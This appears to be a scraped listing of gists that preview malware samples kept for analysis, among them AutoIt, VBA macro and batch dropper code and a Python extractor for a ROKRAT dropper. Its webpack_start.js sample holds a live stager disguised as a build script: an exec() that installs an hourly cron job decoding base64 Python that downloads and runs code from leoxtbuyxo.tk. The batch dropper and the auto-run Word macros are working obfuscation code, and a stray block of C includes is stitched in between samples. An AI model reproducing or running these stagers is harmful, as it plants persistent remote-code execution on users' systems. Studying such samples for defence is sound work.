
seclib / ps1_threat
Last active April 25, 2018 11:44
PowerShell (.ps1) threat sample — preview only; the function body is truncated here.
function _/=\_____/==\/=\/\
{
try
seclib / YQYgT.au3
Created June 17, 2018 14:36
AutoIt malware script, SHA-256 8d82727e497449d3648c29f2216ff026afe8079b070012984aa6954e3ed0b139 (preview only; the script continues past the lines shown)
; Malware sample (AutoIt) kept for analysis - do not run outside an isolated sandbox.
; #NoTrayIcon hides the AutoIt tray icon while the compiled script runs, a common
; choice in unwanted software so the user gets no visual cue that it is running.
#NoTrayIcon
; #EndRegion closes a #Region directive that is not visible in this preview.
#EndRegion
; Global constants with generated-looking names. NOTE(review): what they configure
; is not recoverable from this preview; the code that consumes them (decoder, C2
; settings, file names, etc.) is further down the script - confirm there.
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT" ; same string as the gist file name (YQYgT.au3) minus the extension
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0") ; integer 0, unlike the string "0" / "1" constants around it
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"
seclib / payload-rokrat.py
Created July 7, 2018 18:34
Python script that extracts the embedded malware from the 2018-07-05 HWP (Hangul Word Processor) ROKRAT dropper
# Extract the embedded malware from the HWP dropper with SHA-256 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104.
# Requires Python 2 (cStringIO) plus the oledump and olefile modules on the import path.
import re
import sys
import zlib
import struct
import hashlib
import oledump
import olefile
import binascii
import cStringIO
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <assert.h>
#include <unistd.h>
#include <pthread.h>
#include <time.h>
seclib / webpack_start.js
Created July 20, 2018 02:37
SHA-256 03d9abc82fd79d2f407e7be455995cb9938dcb9d4a52ee41ca5fc47d278a4e7d (webpack_start.js with an embedded cron/python stager; preview only, the exec string is truncated)
'use strict';
// Malware sample kept for analysis - do not execute. The two env assignments are a
// benign-looking preamble (NOTE(review): reads like a build-tool "start" script
// header - confirm against the package it was found in); the exec() call after
// them is the implant.
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
// Persistence + stager. child_process.exec runs a shell command that echoes a
// crontab line scheduled hourly ("0 * * * *"). That line runs `python -c` on a
// base64 blob; the {2:str,3:lambda ...}[sys.version_info[0]] lookup is a Python 2/3
// shim so the blob decodes under either interpreter. The blob decodes to a
// downloader: it builds a urllib/urllib2 opener, sets a Windows IE11-style
// User-Agent ('Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
// and exec()s whatever it fetches from http://leoxtbuyxo.tk:443/... - note plain
// HTTP on port 443, so the traffic is unencrypted despite the port.
// The string literal is cut off in this preview; how the echoed line is installed
// into crontab and anything after it are not visible here.
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2
'use strict';
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Exported ThisDocument class module of a Word document (VB_Base "1Normal.ThisDocument",
' VB_PredeclaredId = True are the standard export header for it). Malware sample kept
' for analysis - do not open the source document with macros enabled.
' The Document_Close handler that follows fires automatically when the document is
' closed. In this preview it only assigns a series of hex-looking strings to codinf
' (each assignment overwrites the previous one); the decoder and End Sub are cut off,
' so the actual action is not visible here.
Private Sub Document_Close()
codinf = "E4F1DDE6E7E1E1D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F1E0E8DEE7F0EB"
codinf = "E0F1E8E2ECDBE8D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5E9ECE0E3D9E6DE"
codinf = "EDEEEDEEE3F1EAD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F0EFF1ECDBE4DF"
codinf = "EBE4D9E8DBE2E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBDDECDCE3DAE1"
codinf = "DBDEE0E9E5E5E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DEDCE6DBE5DEDD"
codinf = "E8E1E8E7DBE2E3D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBE6E4E1EFE9E0"
codinf = "DDDBEEE0E0DBEBD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5D9DCE5DAD9DADD"
@echo off
REM Malware sample - batch dropper kept for analysis, do not run.
REM It writes a VBScript file one character at a time, picking each character out of
REM an alphabet string, so no readable VBS keyword appears in this file.
SETLOCAL
REM gglusyl is cleared first, so the self-reference on the next line adds nothing.
Set gglusyl=
REM Lookup table. A character at offset N is later pulled out with the substring
REM syntax gglusyl:~N,1. Offsets 2-11 are the digits, 12-37 are A-Z, 38-63 are a-z,
REM 64 is the period and 65 is the space.
REM NOTE(review): the value is unquoted, so cmd treats the ampersand after the space
REM as a command separator; the trailing junk then runs as failing commands, which
REM the cls below hides. Confirm exactly what the table contains past offset 65.
Set gglusyl=%gglusyl%("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. &+/)'&__
REM Drop location: a Temp folder directly under the user profile, not the TEMP
REM variable. The screen is cleared right after creating it.
md "%USERPROFILE%\Temp" && cls
REM The dropped file is named after the current user with a .vbs extension; any
REM previous copy is removed before it is rebuilt.
set sxoxobh=%USERNAME%.vbs
del "%USERPROFILE%\Temp\%sxoxobh%"
REM inxovtv expands to the file path followed by the word ECHO, so every line below
REM that starts with the append redirect is really an echo of decoded characters
REM appended to the VBS file.
set inxovtv=%USERPROFILE%\Temp\%sxoxobh% ECHO
REM Decodes to: On Error Resume Next
>>%inxovtv% %gglusyl:~26,1%%gglusyl:~51,1%%gglusyl:~65,1%%gglusyl:~16,1%%gglusyl:~55,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~55,1%%gglusyl:~65,1%%gglusyl:~29,1%%gglusyl:~42,1%%gglusyl:~56,1%%gglusyl:~58,1%%gglusyl:~50,1%%gglusyl:~42,1%%gglusyl:~65,1%%gglusyl:~25,1%%gglusyl:~42,1%%gglusyl:~61,1%%gglusyl:~57,1%
REM Decodes to a VBS declaration list starting: Dim pastaprogram,Lnk,nmarqx,nma...
REM The line is truncated in this preview, as is the rest of the script.
>>%inxovtv% %gglusyl:~15,1%%gglusyl:~46,1%%gglusyl:~50,1%%gglusyl:~65,1%%gglusyl:~53,1%%gglusyl:~38,1%%gglusyl:~56,1%%gglusyl:~57,1%%gglusyl:~38,1%%gglusyl:~53,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~44,1%%gglusyl:~55,1%%gglusyl:~38,1%%gglusyl:~50,1%,%gglusyl:~23,1%%gglusyl:~51,1%%gglusyl:~48,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%gglusyl:~55,1%%gglusyl:~54,1%%gglusyl:~61,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%ggl
seclib / ec7182dbcecd
Created August 19, 2018 12:32
VBA sample
## Uploaded by @satya_enki
## SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd (preview only; AutoOpen runs when the document is opened and is truncated below)
Sub AutoOpen()
Dim abjaWFApqTOaGknEZ As String
Dim EVvHI As Object
Dim aqwMEEghqLNesI As Integer
Dim TgAVw As String
aqwMEEghqLNesI = 816
abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"